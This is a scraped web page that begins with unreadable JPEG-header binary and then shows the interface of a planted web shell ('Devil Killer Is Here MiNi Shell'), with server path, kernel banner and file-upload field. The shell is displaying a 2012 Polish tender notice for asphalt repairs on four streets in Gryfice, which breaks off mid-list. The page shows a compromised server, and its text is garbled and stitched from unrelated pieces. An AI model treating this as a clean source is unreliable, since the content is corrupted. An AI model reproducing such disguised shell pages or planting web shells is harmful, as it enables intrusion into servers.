JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120308/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120308/54661-N-2012.html

<p class="kh_header"><b>Gryfice: Robota budowlana z podziałem na części, polegająca na remoncie warstw konstrukcyjnych asfaltowych nawierzchni jezdni ulic: Akacjowej, Klonowej, Brzozowej i Średniej w Gryficach wraz z wymianą elementów podbudowy drogowej w niezbędnym zakresie oraz robotami towarzyszącymi</b><br>
<b>Numer ogłoszenia: 54661 - 2012; data zamieszczenia: 08.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Gospodarki Komunalnej , ul. Zielona 5, 72-300 Gryfice, woj. zachodniopomorskie, tel. 091 3842047, faks 091 3842214.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.bip.zgk.gryfice.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Robota budowlana z podziałem na części, polegająca na remoncie warstw konstrukcyjnych asfaltowych nawierzchni jezdni ulic: Akacjowej, Klonowej, Brzozowej i Średniej w Gryficach wraz z wymianą elementów podbudowy drogowej w niezbędnym zakresie oraz robotami towarzyszącymi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest kompleksowy remont nawierzchni asfaltowych ulic: Akacjowej, Klonowej i Brzozowej na Osiedlu XXX-lecia w Gryficach oraz remont nawierzchni asfaltowej ulicy Średniej - drogi bez przejazdu - stanowiącej  ulicę  dojazdową do posesji w zachodniej części Gryfic.

2.	Charakterystyka obiektów przeznaczonych do remontu:
Wytypowane do remontu obiekty drogowe należą do kategorii gminnych dróg dojazdowych. Jezdnie ulic przeznaczone do remontu charakteryzują się znacznym stopniem zużycia nawierzchni. Remonty nawierzchni asfaltowej ww. ulic są ostatnim etapem kompleksowej przebudowy ww. dróg dojazdowych w zakresie wymiany nawierzchni chodników i naprawy wyeksploatowanej nawierzchni asfaltowej jezdni tych ulic. Stan nawierzchni ulic przedstawia dokumentacja fotograficzna stanowiąca składnik dokumentacji przetargowej, opublikowanej na stronie internetowej Zamawiającego. 
 
1.2. W zakresie zamówienia przewiduje się wykonanie czterech wyodrębnionych zadań 
        inwestycyjnych, obejmujących kompleksowy remont nawierzchni jezdni ww. czterech ulic.
        Ostateczną decyzję o zakresie prac podejmie Zamawiający po uzyskaniu informacji dotyczących 
        kosztów remontów nawierzchni ulic w wyniku przeprowadzenia postępowania przetargowego.
        Zamówienie zostało podzielone na 4 zadania:
        Zadanie nr 1 obejmuje remont wyeksploatowanego odcinka nawierzchni ul. Akacjowej.                       
        W skład zadania nr 1 wchodzą następujące budowlane prace drogowe:
        - frezowanie nawierzchni bitumicznej na grubość 4-5 cm z wywozem na odległość 7 km                            
           i wyładunkiem frezów - m2 3.492,65;
        - rozbiórka mechaniczna nienośnej podbudowy grubości 15 cm wraz z wywozem i utylizacja 
           materiału - m2 750,5;
        - wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 grubości  
           15 cm - m2 750,5;
        - oczyszczenie podbudowy wraz ze skropieniem emulsją asfaltową - m2 3.492,65;
        - ułożenie warstwy wyrównawczej z BA 0/8 mm - średnia grubość 4 cm - t 349,265;
        - oczyszczenie warstwy wyrównawczej z BA wraz ze skropieniem emulsją asfaltową                                
          - m2 3.492,65;
         - ułożenie warstwy ścieralnej z BA 0/12,8 mm grubości 4 cm - m2 3.492,65;
         - regulacja wysokościowa włazów studni kanałowych - szt. 11;
         - regulacja wysokościowa kratek ściekowych - szt. 1. 
        Zadanie nr 2 obejmuje remont wyeksploatowanego odcinka nawierzchni ul. Klonowej. 
        W skład zadania nr 2 wchodzą następujące budowlane prace drogowe:
        - frezowanie nawierzchni bitumicznej na grubość 4-5 cm z wywozem na odległość 7 km                            
           i wyładunkiem frezów - m2 1.214,88;
        - oczyszczenie podbudowy wraz ze skropieniem emulsją asfaltową - m2 1.214,88;
        - ułożenie warstwy wyrównawczej z BA 0/8 mm - średnia grubość 4 cm - t 121,49;
        - oczyszczenie warstwy wyrównawczej z BA wraz ze skropieniem emulsją asfaltową                                
          - m2 1.214,88;
        - ułożenie warstwy ścieralnej z BA 0/12,8 mm grubości 4 cm - m2 1.214,88;
        - regulacja wysokościowa włazów studni kanałowych - szt. 1;
        - regulacja wysokościowa kratek ściekowych - szt. 1.
        Zadanie nr 3 obejmuje remont całego ciągu nawierzchni ul. Brzozowej.
        W skład zadania nr 3 wchodzą następujące budowlane prace drogowe:
        - frezowanie nawierzchni bitumicznej na grubość 4-5 cm z wywozem na odległość 7 km                            
           i wyładunkiem frezów - m2 1.375;
        - oczyszczenie podbudowy wraz ze skropieniem emulsją asfaltową - m2 1.375;
        - ułożenie warstwy wyrównawczej z BA 0/8 mm - średnia grubość 4 cm - t 137,5;
        - oczyszczenie warstwy wyrównawczej z BA wraz ze skropieniem emulsją asfaltową                                
          - m2 1.375;
        - ułożenie warstwy ścieralnej z BA 0/12,8 mm grubości 4 cm - m2 1.375;
        - rozbiórka progu zwalniającego z elementów gumowych - kpl. 1;
        - montaż progu zwalniającego z elementów gumowych (elementy z rozbiórki) - kpl. 1;
        - regulacja wysokościowa włazów studni kanałowych - szt. 8;
        - regulacja wysokościowa kratek ściekowych - szt. 5;
        - regulacja wysokościowa skrzynek zaworów - szt. 1.
        Zadanie nr 4 obejmuje remont całego ciągu nawierzchni ul. Średniej.
        W skład zadania nr 4 wchodzą następujące budowlane prace drogowe:
        - cięcie nawierzchni bitumicznej - mb 10;
        - oczyszczenie nawierzchni bitumicznej wraz ze skropieniem emulsją asfaltową - m2 290,5;
        - ułożenie warstwy wyrównawczej z BA 0/8 mm - średnia grubość 4 cm - t 8,0;
        - ułożenie warstwy ścieralnej z BA 0/12,8 mm grubości 4 cm - m2 262,5;
        - regulacja wysokościowa włazów studni kanałowych - szt. 4.

1.3. Szczegółowy opis przedmiotu zamówienia stanowią:
       a) plan sytuacyjny robót;
       b) przedmiar robót;
       c) specyfikacje techniczne wykonania i odbioru robót budowlanych w części zawierającej zbiory 
           wymagań w zakresie sposobu wykonania robót budowlanych, obejmujące wymagania                        
           w zakresie właściwości materiałów, wymagania dotyczące sposobu wykonania i oceny 
           prawidłowości wykonania poszczególnych robót.
       Dokumentacja ta jest załącznikiem do ogłoszenia o przetargu i jest dostępna na stronie 
       internetowej Zamawiającego: http://www.bip.zgk.gryfice.eu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.32.52-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przed upływem terminu składania ofert zobowiązany jest wnieść wadium:                                 - na Zadanie nr 1 w wysokości 6.000,00 PLN (słownie: sześć tysięcy złotych 00/100)                              - na Zadanie nr 2 w wysokości 2.000,00 PLN (słownie: dwa tysiące złotych 00/100),                                      - na Zadanie nr 3 w wysokości 2.000,00 PLN (słownie: dwa tysiące złotych 00/100),                         - na Zadanie nr 4 w wysokości 300,00 PLN (słownie: trzysta złotych 00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest  krótszy -  w tym okresie,  wykonał co  najmniej 2 zamówienia polegające  na robocie  budowlanej związanej                       z remontem (wymianą) warstw konstrukcyjnych nawierzchni jezdni asfaltowej, o wartości brutto 300.000 PLN każde</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że dysponuje w szczególności osobami posiadającymi uprawnienia do wykonywania samodzielnych funkcji w  budownictwie                                          w  rozumieniu  ustawy z  dnia  7  lipca  1994  r. Prawo  budowlane /tekst jedn. Dz. U. 2010, Nr 243, poz. 1623 z późn. zm./, w zakresie:
kierowania   robotami   budowlanymi  w   specjalności drogowej, oraz posiadającymi aktualne  
   zaświadczenia o członkostwie we właściwych izbach samorządu zawodowego</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy, w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podawanych warunków ich wprowadzenia.
 1.  Zmiana terminu realizacji przedmiotu umowy  
1.1. Zmiany spowodowane warunkami atmosferycznymi, w szczególności:
a)	klęski żywiołowe,
b)	warunki atmosferyczne uniemożliwiające prowadzenie robót budowlanych,                      przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów.
1.2. Zmiany spowodowane warunkami geologicznymi, archeologicznymi lub terenowymi,                       w szczególności:
a)	niewypały i niewybuchy,
b)	wykopaliska archeologiczne nie przewidywane w SIWZ,
c)	odmienne od przyjętych warunki geologiczne (kategorie gruntu, kurzawka, itp.),
d)	odmienne od przyjętych warunki terenowe, w szczególności istnienie podziemnych                  urządzeń, instalacji lub obiektów infrastrukturalnych.
1.3. Zmiany będące następstwem okoliczności leżących po stronie Zamawiającego,                          w szczególności:
a)	wstrzymanie robót przez Zamawiającego,
b)	konieczność usunięcia błędów lub wprowadzenia zmian w dokumentacji. 
1.4. Inne przyczyny zewnętrzne niezależne od Zamawiającego oraz wykonawcy skutkujące niemożliwością prowadzenia prac.
1.5. W przypadku wystąpienia którejkolwiek z okoliczności wymienionych w pkt. 1 - 4                   termin wykonania umowy może ulec odpowiedniemu przedłużeniu, o czas niezbędny                         do zakończenia wykonywania jej przedmiotu w sposób należyty, nie dłużej jednak niż o okres trwania tych okoliczności. 
O wystąpieniu okoliczności mogących wpłynąć na zmianę terminów Wykonawca winien jest poinformować Zamawiającego pisemnie i natychmiast odnotować to w dzienniku budowy.
Strony z powodów, jakie mogą wpływać na zmiany terminów wykonania robót, wyłączają niedogodności związane z pogodą, typową dla okresu wykonywania robót w miejscu budowy.
2. Zmiana sposobu spełnienia świadczenia
2.1. Zmiany technologiczne, w szczególności:
a)	konieczność zrealizowania zamówienia przy zastosowaniu innych rozwiązań technicznych/technologicznych niż wskazane w dokumentacji, w sytuacji, gdyby  zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym                      wykonaniem zamówienia,
b)	odmienne od przyjętych w dokumentacji warunki geologiczne (kategorie gruntu,                   kurzawka, itp.) skutkujące niemożliwością zrealizowania przedmiotu umowy                         przy dotychczasowych założeniach technologicznych,
c)	odmienne od przyjętych w dokumentacji warunki terenowe, w szczególności istnienie podziemnych urządzeń, instalacji lub obiektów infrastrukturalnych,
d)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych                    lub materiałowych ze względu na zmiany obowiązującego prawa. 
Zmiany, o których mowa w lit b) - c) mogą być wprowadzane w sytuacjach, odpowiadających przesłankom do udzielenia zamówień dodatkowych, oraz w innych sytuacjach, jednakże w tym ostatnim przypadku zamawiający nie zgodzi się na zwiększenie wynagrodzenia, gdy przedmiotem zamówienia jest zaprojektowanie i wykonanie robót budowlanych.
Zmiany wskazywane w lit d) będą wprowadzane wyłącznie w zakresie umożliwiającym                    oddanie przedmiotu umowy do użytkowania, a Zamawiający może ponieść ryzyko                  zwiększenia wynagrodzenia z tytułu takich zmian wyłącznie w kwocie równej zwiększonym                     z tego powodu kosztom. 
Każda ze wskazywanych w lit a) - d) zmian może być powiązana z obniżeniem                            wynagrodzenia na zasadach określonych przez Strony. 
2.2. Zmiany osobowe - zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami i kwalifikacjami,                  o których mowa w ustawie Prawo budowlane lub innych ustawach, a także SIWZ, będzie wymagała również zaakceptowania przez Zamawiającego.
 3. Pozostałe zmiany 
a)	zmiana obowiązującej stawki VAT:
-	jeśli zmiana stawki VAT będzie powodować zwiększenie kosztów wykonania umowy                po stronie Wykonawcy, Zamawiający dopuszcza możliwość zwiększenia wynagrodzenia                      o kwotę równą różnicy w kwocie podatku VAT zapłaconego przez Wykonawcę, 
-	jeśli  zmiana stawki VAT będzie powodować zmniejszenie kosztów wykonania                      umowy po stronie Wykonawcy, Zamawiający dopuszcza możliwość zmniejszenia wynagrodzenia o kwotę stanowiącą różnicę kwoty podatku VAT do zapłacenia przez Wykonawcę,
b)	rezygnacja przez Zamawiającego z realizacji części przedmiotu umowy. W takim                                  przypadku wynagrodzenie przysługujące wykonawcy zostanie pomniejszone, przy czym Zamawiający zapłaci za wszystkie spełnione świadczenia oraz udokumentowane koszty,             które Wykonawca poniósł w związku z wynikającymi z umowy planowanymi świadczeniami. 
c)	kolizja z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami. 
W takim przypadku zmiany w umowie zostaną ograniczone do zmian koniecznych powodujących uniknięcie kolizji, a wynagrodzenie zostanie ustalone z zachowaniem                  zasady opisanej w lit d).
d)	zmiany uzasadnione okolicznościami, o których mowa w art. 357.1 kc, z uwzględnieniem faktu, że za rażącą zostanie uznana strata w wysokości, o której mowa w art. 397 ksh. 
4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. 
5. Nie stanowi zmiany umowy w rozumieniu art. 144 ustawy z dnia 29 stycznia 2004 r.                         
    - Prawo zamówień publicznych (tekst jedn.: Dz. U. z 2007 r. Nr 223, poz. 1655 z późn. 
       zm.):
a)	zmiana danych związanych z obsługą administracyjno-organizacyjną umowy                          (np. zmiana numeru rachunku bankowego), 
b)	zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów między Stronami,
c)	udzielenie zamówień dodatkowych określonych w przepisach dot. zamówień publicznych, 
d)   udzielenie zamówień uzupełniających w zakresie wskazanym w specyfikacji istotnych     
       warunków zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.zgk.gryfice.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Gospodarki Komunalnej, ul. Zielona 5, 72-300 Gryfice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.03.2012 godzina 10:00, miejsce: Zakład Gospodarki Komunalnej w Gryficach ul. Zielona 5, budynek Zarządu, pok. nr 4 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 21.04.2012.</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kompleksowy remont odcinka nawierzchni jezdni ul. Akacjowej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 obejmuje remont wyeksploatowanego odcinka nawierzchni ul. Akacjowej. W skład zadania nr 1 wchodzą następujące budowlane prace drogowe:
- frezowanie nawierzchni bitumicznej na grubość 4-5 cm z wywozem na odległość 7 km                                
  i wyładunkiem frezów - m2 3.492,65;
- rozbiórka mechaniczna nienośnej podbudowy grubości 15 cm wraz z wywozem i utylizacja 
   materiału - m2 750,5;
- wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie 0/31,5 grubości 15 cm                           
   - m2 750,5;
- oczyszczenie podbudowy wraz ze skropieniem emulsją asfaltową - m2 3.492,65;
